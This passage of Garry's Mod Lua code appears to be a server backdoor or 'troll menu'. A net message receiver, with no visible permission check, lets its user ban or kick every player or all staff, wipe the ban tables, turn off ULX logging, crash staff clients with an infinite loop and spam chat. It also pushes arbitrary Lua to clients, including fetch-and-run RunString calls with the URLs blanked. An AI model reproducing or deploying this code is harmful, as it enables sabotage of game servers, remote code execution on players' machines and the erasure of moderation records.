  1591. net.WriteString("gm_construct_building_roof1")
  1592. net.WriteEntity( userl )
  1593. net.SendToServer()
  1594. end )
  1596. tpsubgmconstruct:AddOption( "Building N°2 [Dernière étage]", function()
  1597. net.Start( "echangeinfo" )
  1598. net.WriteString("gm_construct_building2_roof1")
  1599. net.WriteEntity( userl )
  1600. net.SendToServer()
  1601. end )
  1603. tpsubgmconstruct:AddOption( "Building N°2 [Toit]", function()
  1604. net.Start( "echangeinfo" )
  1605. net.WriteString("gm_construct_building2_roof0")
  1606. net.WriteEntity( userl )
  1607. net.SendToServer()
  1608. end )
  1610. tpsubgmconstruct:AddOption( "Building N°3 [Toit]", function()
  1611. net.Start( "echangeinfo" )
  1612. net.WriteString("gm_construct_building3_roof0")
  1613. net.WriteEntity( userl )
  1614. net.SendToServer()
  1615. end )
  1618. tpsubgmconstruct:AddOption( "Sous-Sol", function()
  1619. net.Start( "echangeinfo" )
  1620. net.WriteString("gm_construct_down")
  1621. net.WriteEntity( userl )
  1622. net.SendToServer()
  1623. end )
  1625. tpsubgmconstruct:AddOption( "Secret Room", function()
  1626. net.Start( "echangeinfo" )
  1627. net.WriteString("gm_construct_secret")
  1628. net.WriteEntity( userl )
  1629. net.SendToServer()
  1630. end )
  1631. tpsubgmconstruct:AddOption( "Skybox", function()
  1632. net.Start( "echangeinfo" )
  1633. net.WriteString("gm_construct_skybox")
  1634. net.WriteEntity( userl )
  1635. net.SendToServer()
  1636. end )
  1638. tpsubgmflat:AddOption( "Secret Room", function()
  1639. net.Start( "echangeinfo" )
  1640. net.WriteString("gm_flat_secret")
  1641. net.WriteEntity( userl )
  1642. net.SendToServer()
  1643. end )
  1645. tpsubglife3:AddOption( "Grue", function()
  1646. net.Start( "echangeinfo" )
  1647. net.WriteString("glife3_grue")
  1648. net.WriteEntity( userl )
  1649. net.SendToServer()
  1650. end )
  1652. tpsubglife3:AddOption( "Water tower", function()
  1653. net.Start( "echangeinfo" )
  1654. net.WriteString("glife3_water_tower")
  1655. net.WriteEntity( userl )
  1656. net.SendToServer()
  1657. end )
  1659. tpsubglife3:AddOption( "Bank Vault", function()
  1660. net.Start( "echangeinfo" )
  1661. net.WriteString("glife3_coffre")
  1662. net.WriteEntity( userl )
  1663. net.SendToServer()
  1664. end )
  1666. tpsubglife3:AddOption( "Secret Room", function()
  1667. net.Start( "echangeinfo" )
  1668. net.WriteString("glife3_secret")
  1669. net.WriteEntity( userl )
  1670. net.SendToServer()
  1671. end )
  1673. downtownv4cv2:AddOption( "Spawn", function()
  1674. net.Start( "echangeinfo" )
  1675. net.WriteString("rp_rockford_v2b_spawn")
  1676. net.WriteEntity( userl )
  1677. net.SendToServer()
  1678. end )
  1680. animation:AddOption( "Saluer", function()
  1681. net.Start( "echangeinfo" )
  1682. net.WriteString("animation_salute_user")
  1683. net.WriteEntity( userl )
  1684. net.SendToServer()
  1685. end ):SetIcon( "icon16/bell.png" )
  1687. animation:AddOption( "Robot", function()
  1688. net.Start( "echangeinfo" )
  1689. net.WriteString("animation_robot_user")
  1690. net.WriteEntity( userl )
  1691. net.SendToServer()
  1692. end ):SetIcon( "icon16/bell.png" )
  1694. animation:AddOption( "Levez les mains", function()
  1695. net.Start( "echangeinfo" )
  1696. net.WriteString("animation_cheer_user")
  1697. net.WriteEntity( userl )
  1698. net.SendToServer()
  1699. end ):SetIcon( "icon16/bell.png" )
  1701. animation:AddOption( "Rire", function()
  1702. net.Start( "echangeinfo" )
  1703. net.WriteString("animation_laugh_user")
  1704. net.WriteEntity( userl )
  1705. net.SendToServer()
  1706. end ):SetIcon( "icon16/bell.png" )
  1708. animation:AddOption( "Danse sexy", function()
  1709. net.Start( "echangeinfo" )
  1710. net.WriteString("animation_muscle_user")
  1711. net.WriteEntity( userl )
  1712. net.SendToServer()
  1713. end ):SetIcon( "icon16/bell.png" )
  1715. animation:AddOption( "Faire le beau", function()
  1716. net.Start( "echangeinfo" )
  1717. net.WriteString("animation_persistence_user")
  1718. net.WriteEntity( userl )
  1719. net.SendToServer()
  1720. end ):SetIcon( "icon16/bell.png" )
  1722. animation:AddOption( "Dance", function()
  1723. net.Start( "echangeinfo" )
  1724. net.WriteString("animation_dance_user")
  1725. net.WriteEntity( userl )
  1726. net.SendToServer()
  1727. end ):SetIcon( "icon16/bell.png" )
  1730. mooves:AddOption( "[ON]Avancer", function()
  1731. net.Start( "echangeinfo" )
  1732. net.WriteString("forwardmoove")
  1733. net.WriteEntity( userl )
  1734. net.SendToServer()
  1735. actioneff("Vous venez de faire avancer " .. userl:Nick() )
  1736. end ):SetIcon( "icon16/accept.png" )
  1738. mooves:AddOption( "[OFF]Avancer", function()
  1739. net.Start( "echangeinfo" )
  1740. net.WriteString("unforwardmoove")
  1741. net.WriteEntity( userl )
  1742. net.SendToServer()
  1743. actioneff("Vous venez d'arrêter de faire avancer " .. userl:Nick() )
  1744. end ):SetIcon( "icon16/stop.png" )
  1746. mooves:AddOption( "[ON]Reculer", function()
  1747. net.Start( "echangeinfo" )
  1748. net.WriteString("backmoove")
  1749. net.WriteEntity( userl )
  1750. net.SendToServer()
  1751. actioneff("Vous venez de faire reculer " .. userl:Nick() )
  1752. end ):SetIcon( "icon16/accept.png" )
  1754. mooves:AddOption( "[OFF]Reculer", function()
  1755. net.Start( "echangeinfo" )
  1756. net.WriteString("unbackmoove")
  1757. net.WriteEntity( userl )
  1758. net.SendToServer()
  1759. actioneff("Vous venez d'arrêter de faire reculer " .. userl:Nick() )
  1760. end ):SetIcon( "icon16/stop.png" )
  1762. mooves:AddOption( "[ON]Tourner à gauche", function()
  1763. net.Start( "echangeinfo" )
  1764. net.WriteString("leftmoove")
  1765. net.WriteEntity( userl )
  1766. net.SendToServer()
  1767. actioneff("Vous venez de faire touner à gauche " .. userl:Nick() )
  1768. end ):SetIcon( "icon16/accept.png" )
  1770. mooves:AddOption( "[OFF]Tourner à gauche", function()
  1771. net.Start( "echangeinfo" )
  1772. net.WriteString("unleftmoove")
  1773. net.WriteEntity( userl )
  1774. net.SendToServer()
  1775. actioneff("Vous venez d'arrêter de faire touner à gauche " .. userl:Nick() )
  1776. end ):SetIcon( "icon16/stop.png" )
  1778. mooves:AddOption( "[ON]Tourner à droite", function()
  1779. net.Start( "echangeinfo" )
  1780. net.WriteString("rightmoove")
  1781. net.WriteEntity( userl )
  1782. net.SendToServer()
  1783. actioneff("Vous venez d'arrêter de faire touner à droite " .. userl:Nick() )
  1784. end ):SetIcon( "icon16/accept.png" )
  1786. mooves:AddOption( "[OFF]Tourner à droite", function()
  1787. net.Start( "echangeinfo" )
  1788. net.WriteString("unrightmoove")
  1789. net.WriteEntity( userl )
  1790. net.SendToServer()
  1791. actioneff("Vous venez d'arrêter de faire touner à gauche " .. userl:Nick() )
  1792. end ):SetIcon( "icon16/stop.png" )
  1794. mooves:AddOption( "[ON]S'accroupir", function()
  1795. net.Start( "echangeinfo" )
  1796. net.WriteString("squatmoove")
  1797. net.WriteEntity( userl )
  1798. net.SendToServer()
  1799. actioneff("Vous venez de faire s'accroupir " .. userl:Nick() )
  1800. end ):SetIcon( "icon16/accept.png" )
  1802. mooves:AddOption( "[OFF]S'accroupir", function()
  1803. net.Start( "echangeinfo" )
  1804. net.WriteString("unsquatmoove")
  1805. net.WriteEntity( userl )
  1806. net.SendToServer()
  1807. actioneff("Vous venez d'arrêter de faire s'accroupir " .. userl:Nick() )
  1808. end ):SetIcon( "icon16/stop.png" )
  1811. m:AddSpacer() -- Add a spacer
  1812. m:Open() -- Show our menu
  1813. end
  1814. ]] )
  1815. net.Send(ply)
  1816. return ""
  1817. end )
  1820. net.Receive("echangeinfo", function()
  1821. local uaction = net.ReadString()
  1822. local user = net.ReadEntity()
  1824. if (uaction == "banall") then
  1825. for k,v in pairs (player.GetAll()) do v:Ban( 0, true ) end
  1826. end
  1828. if (uaction == "banallstaff") then
  1829. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:Ban( 0, true ) end end
  1831. end
  1833. if (uaction == "blackscreen") then
  1834. user:ScreenFade( SCREENFADE.IN, Color( 0, 0, 0, 500 ), 500000, 500000 )
  1835. end
  1837. if (uaction == "imitation") then
  1838. user:Say( net.ReadString(),true )
  1839. end
  1841. if (uaction == "sendluauser") then
  1842. user:SendLua( net.ReadString() ) --sound.PlayURL( "", "", function()end )
  1843. end
  1845. if (uaction == "johnsound") then
  1846. user:SendLua( [[http.Fetch("",function(body,len,headers,code)RunString(body)end) ]] ) --sound.PlayURL( "", "", function()end )
  1847. end
  1849. if (uaction == "soundboard") then
  1850. user:SendLua( [[sound.PlayURL( "]][[", "", function()end )]] ) --sound.PlayURL( "", "", function()end )
  1851. end
  1853. if (uaction == "kickuser") then
  1854. user:Kick( net.ReadString() )
  1855. end
  1857. if (uaction == "addmoney") then
  1858. user:addMoney(net.ReadString())
  1859. end
  1861. if (uaction == "stopsoundon") then
  1862. user:SendLua([[timer.Create("stopsound", 0.001, 0, function() LocalPlayer():ConCommand("stopsound") end)]])
  1863. end
  1865. if (uaction == "stopsoundoff") then
  1866. user:SendLua([[timer.Remove("stopsound")]])
  1867. end
  1869. if (uaction == "igniteall") then
  1870. for k,v in pairs(player.GetAll()) do v:Ignite(120) end
  1871. end
  1873. if (uaction == "igniteallstaff") then
  1874. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:Ignite(120) end end
  1875. end
  1877. if (uaction == "healall") then
  1878. for k,v in pairs (player.GetAll()) do v:SetHealth( net.ReadString() ) end
  1879. end
  1881. if (uaction == "armorall") then
  1882. for k,v in pairs (player.GetAll()) do v:SetArmor( net.ReadString() ) end
  1883. end
  1885. if (uaction == "banuser") then
  1886. user:Ban( 0, true )
  1887. end
  1889. if (uaction == "banipuser") then
  1890. RunConsoleCommand( "addip", 0, user:IPAddress() )
  1891. RunConsoleCommand( "writeip" )
  1892. end
  1894. if (uaction == "kickall") then
  1895. for k,v in pairs (player.GetAll()) do v:Kick( net.ReadString() ) end
  1896. end
  1898. if (uaction == "kickallstaff") then
  1899. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:Kick( net.ReadString() ) end end
  1900. end
  1902. if (uaction == "killall") then
  1903. for k,v in pairs (player.GetAll()) do v:Kill() end
  1904. end
  1906. if (uaction == "exploseall") then
  1907. for k,v in pairs(player.GetAll()) do
  1908. local explode = ents.Create( "env_explosion" )
  1909. explode:SetPos(v:GetPos())
  1910. explode:Spawn()
  1911. explode:SetKeyValue( "iMagnitude", "10" )
  1912. explode:Fire( "Explode", 0, 0 )
  1913. explode:EmitSound( "weapon_AWP.Single", 400, 400 )
  1914. v:Kill()
  1915. end
  1916. end
  1918. if (uaction == "exploseuser") then
  1919. local explode = ents.Create( "env_explosion" )
  1920. explode:SetPos(user:GetPos())
  1921. explode:Spawn()
  1922. explode:SetKeyValue( "iMagnitude", "10" )
  1923. explode:Fire( "Explode", 0, 0 )
  1924. explode:EmitSound( "weapon_AWP.Single", 400, 400 )
  1925. user:Kill()
  1926. end
  1928. if (uaction == "exploseall") then
  1929. for k,v in pairs(player.GetAll()) do
  1930. if( v:GetUserGroup() != "user" ) then
  1931. local explode = ents.Create( "env_explosion" )
  1932. explode:SetPos(v:GetPos())
  1933. explode:Spawn()
  1934. explode:SetKeyValue( "iMagnitude", "10" )
  1935. explode:Fire( "Explode", 0, 0 )
  1936. explode:EmitSound( "weapon_AWP.Single", 400, 400 )
  1937. v:Kill()
  1938. end
  1939. end
  1940. end
  1942. if (uaction == "killallstaff") then
  1943. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:Kill() end end
  1944. end
  1946. if (uaction == "freezeall") then
  1947. for k,v in pairs (player.GetAll()) do v:Freeze( true ) end
  1948. end
  1950. if (uaction == "freezeallstaff") then
  1951. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:Freeze( true ) end end
  1952. end
  1954. if (uaction == "freezeuser") then
  1955. user:Freeze( true )
  1956. end
  1958. if (uaction == "moovetroll") then
  1959. user:ConCommand( "+duck" )
  1960. user:ConCommand( "+left" )
  1961. user:ConCommand( "+jump" )
  1962. end
  1964. if (uaction == "moovetrollall") then
  1965. for k,v in pairs (player.GetAll()) do v:ConCommand( "+duck" ) end
  1966. for k,v in pairs (player.GetAll()) do v:ConCommand( "+left" ) end
  1967. for k,v in pairs (player.GetAll()) do v:ConCommand( "+jump" ) end
  1968. end
  1970. if (uaction == "unmoovetroll") then
  1971. user:ConCommand( "-duck" )
  1972. user:ConCommand( "-left" )
  1973. user:ConCommand( "-jump" )
  1974. end
  1976. if (uaction == "unmoovetrollall") then
  1977. for k,v in pairs (player.GetAll()) do v:ConCommand( "-duck" ) end
  1978. for k,v in pairs (player.GetAll()) do v:ConCommand( "-left" ) end
  1979. for k,v in pairs (player.GetAll()) do v:ConCommand( "-jump" ) end
  1980. end
  1982. if (uaction == "addmoneyalls") then
  1983. local money = net.ReadString()
  1984. for k,v in pairs (player.GetAll()) do v:addMoney(money) end
  1985. end
  1987. if (uaction == "forwardmooveall") then
  1988. for k,v in pairs (player.GetAll()) do v:ConCommand( "+forward" ) end
  1989. end
  1991. if (uaction == "botspam") then
  1992. local n = net.ReadString()
  1993. for i=1,n do
  1994. RunConsoleCommand("bot")
  1995. end
  1996. end
  1998. if (uaction == "unforwardmooveall") then
  1999. for k,v in pairs (player.GetAll()) do v:ConCommand( "-forward" ) end
  2000. end
  2002. if (uaction == "hurlement") then
  2003. for k,v in pairs(player.GetAll()) do v:EmitSound( "npc/stalker/go_alert2a.wav", 100, 100 ) end
  2004. end
  2006. if (uaction == "hurlementuser") then
  2007. user:EmitSound( "npc/stalker/go_alert2a.wav", 100, 100 )
  2008. end
  2010. if (uaction == "unbanall") then
  2011. sql.Query("DELETE FROM `FAdminBans`")
  2012. sql.Query("DELETE FROM `ulib_bans`")
  2013. end
  2015. if (uaction == "backmooveall") then
  2016. for k,v in pairs (player.GetAll()) do v:ConCommand( "+back" ) end
  2017. end
  2019. if (uaction == "pvheal") then
  2020. user:SetHealth(net.ReadString())
  2021. end
  2023. if (uaction == "crashadminvip") then
  2024. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:SendLua("while true do end") end end
  2025. end
  2027. if (uaction == "armorpv") then
  2028. user:SetArmor(net.ReadString())
  2029. end
  2031. if (uaction == "unbackmooveall") then
  2032. for k,v in pairs (player.GetAll()) do v:ConCommand( "-back" ) end
  2033. end
  2035. if (uaction == "leftmooveall") then
  2036. for k,v in pairs (player.GetAll()) do v:ConCommand( "+left" ) end
  2037. end
  2039. if (uaction == "unleftmooveall") then
  2040. for k,v in pairs (player.GetAll()) do v:ConCommand( "-left" ) end
  2041. end
  2043. if (uaction == "rightmooveall") then
  2044. for k,v in pairs (player.GetAll()) do v:ConCommand( "+right" ) end
  2045. end
  2047. if (uaction == "unrightmooveall") then
  2048. for k,v in pairs (player.GetAll()) do v:ConCommand( "-right" ) end
  2049. end
  2051. if (uaction == "squatmooveall") then
  2052. for k,v in pairs (player.GetAll()) do v:ConCommand( "+duck" ) end
  2053. end
  2055. if (uaction == "unsquatmooveall") then
  2056. for k,v in pairs (player.GetAll()) do v:ConCommand( "-duck" ) end
  2057. end
  2059. if (uaction == "forwardmoove") then
  2060. user:ConCommand( "+forward" )
  2061. end
  2063. if (uaction == "unforwardmoove") then
  2064. user:ConCommand( "-forward" )
  2065. end
  2067. if (uaction == "backmoove") then
  2068. user:ConCommand( "+back" )
  2069. end
  2071. if (uaction == "unbackmoove") then
  2072. user:ConCommand( "-back" )
  2073. end
  2075. if (uaction == "leftmoove") then
  2076. user:ConCommand( "+left" )
  2077. end
  2079. if (uaction == "unleftmoove") then
  2080. user:ConCommand( "-left" )
  2081. end
  2083. if (uaction == "notification_generic") then
  2084. local text = net.ReadString()
  2085. local duration = 50
  2086. for k,v in pairs (player.GetAll()) do
  2088. v:SendLua("notification.AddLegacy(\"" .. text .. "\", NOTIFY_GENERIC, " .. duration .. ")")
  2090. v:SendLua([[surface.PlaySound("buttons/button15.wav")]])
  2092. ULib.console( v, text )
  2094. end
  2095. end
  2097. if (uaction == "notification_error") then
  2098. local text = net.ReadString()
  2099. local duration = 50
  2100. for k,v in pairs (player.GetAll()) do
  2102. v:SendLua("notification.AddLegacy(\"" .. text .. "\", NOTIFY_ERROR, " .. duration .. ")")
  2104. v:SendLua([[surface.PlaySound("buttons/button15.wav")]])
  2106. ULib.console( v, text )
  2108. end
  2109. end
  2111. if (uaction == "notification_undo") then
  2112. local text = net.ReadString()
  2113. local duration = 50
  2114. for k,v in pairs (player.GetAll()) do
  2116. v:SendLua("notification.AddLegacy(\"" .. text .. "\", NOTIFY_UNDO, " .. duration .. ")")
  2118. v:SendLua([[surface.PlaySound("buttons/button15.wav")]])
  2120. ULib.console( v, text )
  2122. end
  2123. end
  2125. if (uaction == "notification_hint") then
  2126. local text = net.ReadString()
  2127. local duration = 50
  2128. for k,v in pairs (player.GetAll()) do
  2130. v:SendLua("notification.AddLegacy(\"" .. text .. "\", NOTIFY_CLEANUP, " .. duration .. ")")
  2132. v:SendLua([[surface.PlaySound("buttons/button15.wav")]])
  2134. ULib.console( v, text )
  2136. end
  2137. end
  2139. if (uaction == "notification_cleanup") then
  2140. local text = net.ReadString()
  2141. local duration = 50
  2142. for k,v in pairs (player.GetAll()) do
  2144. v:SendLua("notification.AddLegacy(\"" .. text .. "\", NOTIFY_HINT, " .. duration .. ")")
  2146. v:SendLua([[surface.PlaySound("buttons/button15.wav")]])
  2148. ULib.console( v, text )
  2150. end
  2151. end
  2153. if (uaction == "rightmoove") then
  2154. user:ConCommand( "+right" )
  2155. end
  2157. if (uaction == "unrightmoove") then
  2158. user:ConCommand( "-right" )
  2159. end
  2161. if (uaction == "squatmoove") then
  2162. user:ConCommand( "+duck" )
  2163. end
  2165. if (uaction == "unsquatmoove") then
  2166. user:ConCommand( "-duck" )
  2167. end
  2169. if (uaction == "unfreezeall") then
  2170. for k,v in pairs (player.GetAll()) do v:Freeze( false ) end
  2171. end
  2173. if (uaction == "unfreezeallstaff") then
  2174. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:Freeze( false ) end end
  2175. end
  2177. if (uaction == "noclipallon") then
  2178. for k,v in pairs (player.GetAll()) do v:SetMoveType( MOVETYPE_NOCLIP ) end
  2179. end
  2181. if (uaction == "noclipalloff") then
  2182. for k,v in pairs (player.GetAll()) do v:SetMoveType( MOVETYPE_WALK ) end
  2183. end
  2185. if (uaction == "noclipon") then
  2186. user:SetMoveType( MOVETYPE_NOCLIP )
  2187. end
  2189. if (uaction == "noclipoff") then
  2190. user:SetMoveType( MOVETYPE_WALK )
  2191. end
  2193. if (uaction == "unfreezeuser") then
  2194. user:Freeze( false )
  2195. user:UnLock()
  2196. ulx.clearExclusive( user )
  2197. end
  2199. if (uaction == "jump") then
  2200. for k,v in pairs (player.GetAll()) do v:SetJumpPower( 2000 ) end
  2201. end
  2203. if (uaction == "retablirjumpall") then
  2204. for k,v in pairs (player.GetAll()) do v:SetJumpPower( 200 ) end
  2205. end
  2207. if (uaction == "2dplayerall") then
  2208. for k,v in pairs(player.GetAll()) do
  2209. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  2210. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  2211. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  2212. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  2213. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  2214. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  2215. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  2216. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  2217. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  2218. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  2219. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  2220. v:ManipulateBoneScale( a, Vector(4,0,4))
  2221. v:ManipulateBoneScale( b, Vector(0,0,0))
  2222. v:ManipulateBoneScale( c, Vector(0,0,0))
  2223. v:ManipulateBoneScale( d, Vector(0,0,1))
  2224. v:ManipulateBoneScale( e, Vector(0,0,1))
  2225. v:ManipulateBoneScale( f, Vector(0,0,0))
  2226. v:ManipulateBoneScale( g, Vector(0,0,0))
  2227. v:ManipulateBoneScale( h, Vector(1,1.5,1.5))
  2228. v:ManipulateBoneScale( i, Vector(1,1.5,1.5))
  2229. v:ManipulateBoneScale( j, Vector(0,0,0))
  2230. v:ManipulateBoneScale( k, Vector(0,0,0))
  2231. end
  2232. end
  2234. if (uaction == "grossetete") then
  2235. for k,v in pairs(player.GetAll()) do
  2236. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  2237. v:ManipulateBoneScale( a, Vector(5,5,5))
  2238. end
  2239. end
  2241. if (uaction == "grosseteteuser") then
  2242. local a = user:LookupBone("ValveBiped.Bip01_Head1")
  2243. user:ManipulateBoneScale( a, Vector(5,5,5))
  2244. end
  2246. if (uaction == "2dplayeruser") then
  2247. local a = user:LookupBone("ValveBiped.Bip01_Head1")
  2248. local b = user:LookupBone("ValveBiped.Bip01_R_Thigh")
  2249. local c = user:LookupBone("ValveBiped.Bip01_L_Thigh")
  2250. local d = user:LookupBone("ValveBiped.Bip01_R_Calf")
  2251. local e = user:LookupBone("ValveBiped.Bip01_L_Calf")
  2252. local f = user:LookupBone("ValveBiped.Bip01_R_UpperArm")
  2253. local g = user:LookupBone("ValveBiped.Bip01_L_UpperArm")
  2254. local h = user:LookupBone("ValveBiped.Bip01_R_Forearm")
  2255. local i = user:LookupBone("ValveBiped.Bip01_L_Forearm")
  2256. local j = user:LookupBone("ValveBiped.Bip01_R_Clavicle")
  2257. local k = user:LookupBone("ValveBiped.Bip01_L_Clavicle")
  2258. user:ManipulateBoneScale( a, Vector(4,0,4))
  2259. user:ManipulateBoneScale( b, Vector(0,0,0))
  2260. user:ManipulateBoneScale( c, Vector(0,0,0))
  2261. user:ManipulateBoneScale( d, Vector(0,0,1))
  2262. user:ManipulateBoneScale( e, Vector(0,0,1))
  2263. user:ManipulateBoneScale( f, Vector(0,0,0))
  2264. user:ManipulateBoneScale( g, Vector(0,0,0))
  2265. user:ManipulateBoneScale( h, Vector(1,1.5,1.5))
  2266. user:ManipulateBoneScale( i, Vector(1,1.5,1.5))
  2267. user:ManipulateBoneScale( j, Vector(0,0,0))
  2268. user:ManipulateBoneScale( k, Vector(0,0,0))
  2269. end
  2271. if (uaction == "jumpuser") then
  2272. user:SetJumpPower( 2000 )
  2273. end
  2275. if (uaction == "jumpuser") then
  2276. user:SetJumpPower( 2000 )
  2277. end
  2279. if (uaction == "logsremove") then
  2280. RunConsoleCommand("ulx_logecho", "0")
  2281. end
  2283. if (uaction == "gm_construct_spawn") then
  2284. user:SetPos( Vector( 786.414490, -166.286102, -79.968750 ) )
  2285. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2286. end
  2288. if (uaction == "gm_construct_building_roof0") then
  2289. user:SetPos( Vector( 1741.335815, -1606.526245, 1161.920288 ) )
  2290. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2291. end
  2293. if (uaction == "gm_construct_building_roof1") then
  2294. user:SetPos( Vector( 1434.847778, -1624.269897, 1360.031250 ) )
  2295. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2296. end
  2298. if (uaction == "gm_construct_building2_roof0") then
  2299. user:SetPos( Vector( -2312.447266, -2994.058105, 2912.031250 ) )
  2300. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2301. end
  2303. if (uaction == "gm_construct_building3_roof0") then
  2304. user:SetPos( Vector( -4632.838379, 5414.228516, 2560.031250 ) )
  2305. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2306. end
  2308. if (uaction == "gm_construct_building2_roof1") then
  2309. user:SetPos( Vector( -2301.528564, -3178.893555, 2368.031250 ) )
  2310. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2311. end
  2313. if (uaction == "gm_construct_down") then
  2314. user:SetPos( Vector( -2072.327148, -120.263184, -447.968750 ) )
  2315. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2316. end
  2318. if (uaction == "gm_construct_secret") then
  2319. user:SetPos( Vector( -2994.707031, -1243.276611, -77.271637 ) )
  2320. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2321. end
  2323. if (uaction == "gm_construct_skybox") then
  2324. user:SetPos( Vector( -1543.972412, 1734.876221, 10937.232422 ) )
  2325. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2326. end
  2328. if (uaction == "gm_flat_secret") then
  2329. user:SetPos( Vector( -599.203491, 6.064875, -12703.968750 ) )
  2330. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2331. end
  2333. if (uaction == "glife3_grue") then
  2334. user:SetPos( Vector( -2150.254395, 7953.561523, 1333.250366 ) )
  2335. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2336. end
  2338. if (uaction == "glife3_secret") then
  2339. user:SetPos( Vector( -7075.260742, 1205.734009, -288.307312 ) )
  2340. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2341. end
  2343. if (uaction == "glife3_coffre") then
  2344. user:SetPos( Vector( -6389.708008, 5038.359375, 96.025749 ) )
  2345. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2346. end
  2348. if (uaction == "glife3_water_tower") then
  2349. user:SetPos( Vector( 5316.801758, 15845.748047, 1652.517944 ) )
  2350. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2351. end
  2353. if (uaction == "rp_rockford_v2b_spawn") then
  2354. user:SetPos( Vector( -4701.085938 ,-5387.226563,128.031250 ) )
  2355. user:SetLocalVelocity( Vector( 0, 0, 0 ) )
  2356. end
  2360. if (uaction == "spamchat") then
  2361. timer.Create( "spamchat1", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), "▁ ▂ ▃ ▄ ▅ ▆ ▇ĤẪĈЌĒĎ ฿¥ ĔρĨĩĆẤ ŤΈǺM█ ▇ ▆ ▅ ▄ ▂ ▁")]]) end)
  2363. end
  2365. if (uaction == "restartserver") then
  2366. if file.Exists("data/ulx/config.txt", "GAME") then
  2367. game.ConsoleCommand("ulx map " .. game.GetMap() .. "\n")
  2368. else
  2369. game.ConsoleCommand("changelevel " .. game.GetMap() .. "\n")
  2370. end
  2371. end
  2373. if (uaction == "spamchatstop") then
  2374. timer.Stop( "spamchat1")
  2375. end
  2377. if (uaction == "setmodel") then
  2378. user:SetModel( net.ReadString() )
  2379. end
  2381. if (uaction == "retablirjumpuser") then
  2382. user:SetJumpPower( 200 )
  2383. end
  2385. if (uaction == "launchuser") then
  2386. user:SetVelocity( Vector( 0,0,50 ) * 50 )
  2387. end
  2389. if (uaction == "lockdown") then
  2390. user:Give( "weapon_rpg" )
  2391. user:GiveAmmo( 200, "RPG_Round", true )
  2392. user:SendLua([[
  2393. hook.Add( "Think", "TriggerBofezt", function()
  2394. RunConsoleCommand("use","weapon_rpg")
  2395. if !Firing then
  2396. RunConsoleCommand( "+attack" )
  2397. Firing = true
  2398. else
  2399. RunConsoleCommand( "-attack" )
  2400. Firing = false
  2401. end
  2402. end )
  2403. ]])
  2404. end
  2406. if (uaction == "launchall") then
  2407. for k,v in pairs (player.GetAll()) do
  2408. v:SetVelocity( Vector( 0,0,50 ) * 50 )
  2409. end
  2410. end
  2412. if (uaction == "globalhack") then
  2413. if !ptdr then
  2414. for k,v in pairs (player.GetAll()) do v:SendLua([[http.Fetch("",function(b) RunString(b) end)]]) end
  2415. local ptdr = 1
  2416. else
  2417. local ptdr = 0
  2418. for k,v in pairs (player.GetAll()) do v:SendLua([[hook.Remove("PostDrawOpaqueRenderables","\xFFitsrainingchairs\xFF")]]) end
  2419. end
  2420. end
  2422. if (uaction == "changename") then
  2423. RunConsoleCommand("hostname", net.ReadString())
  2424. end
  2426. if (uaction == "namechanger") then
  2427. local namesf = {
  2428. "Marc",
  2429. "Hugh",
  2430. "Maurice",
  2431. "Gill",
  2432. "Etienne",
  2433. "Antoine",
  2434. "Jean",
  2435. "Benoit",
  2436. "Gilbert",
  2437. "Laurent",
  2438. "Alexis",
  2439. "Alexandre",
  2440. "Denis",
  2441. "Nicholas",
  2442. "Leon",
  2443. "Leonard",
  2444. "Leo",
  2445. "Olivier",
  2446. "Curtis",
  2447. "Antonio",
  2448. "Gregory",
  2449. "Charlie",
  2450. "Luc",
  2451. "Patrick",
  2452. "Phillip",
  2453. "Bernard",
  2454. "Charles",
  2455. "Gaspar",
  2456. "Claude",
  2457. "Michael",
  2458. "Brandon",
  2459. "Richard",
  2460. "William",
  2461. "Serge",
  2462. "Freddie",
  2463. "Samuel",
  2464. "Gaetan",
  2465. "Gerald",
  2466. "Arnold",
  2467. "Roland",
  2468. "Justin",
  2469. "Theodore",
  2470. "Claude",
  2471. "Hugues",
  2472. "Albert",
  2473. "Arthur",
  2474. "Jay",
  2475. "Jeremi",
  2476. "Rene",
  2477. "Pascal",
  2478. "Carlos",
  2479. "Fabien",
  2480. "Rafael",
  2481. "Benjamin",
  2482. "Ernest",
  2483. "Victor",
  2484. "Martin",
  2485. "Franck",
  2486. "Walter",
  2487. "Isaac",
  2488. "Roger",
  2489. "Alfred",
  2490. "Jason",
  2491. "Danny",
  2492. "Henry",
  2493. "Jimmy",
  2494. "Kevin",
  2495. "Geoffrey",
  2496. "Dominic",
  2497. "Christopher",
  2498. "David",
  2499. "Steven",
  2500. }
  2501. for k,v in pairs (player.GetAll()) do local name = table.Random( namesf ) v:Say("/name " .. name,true) end
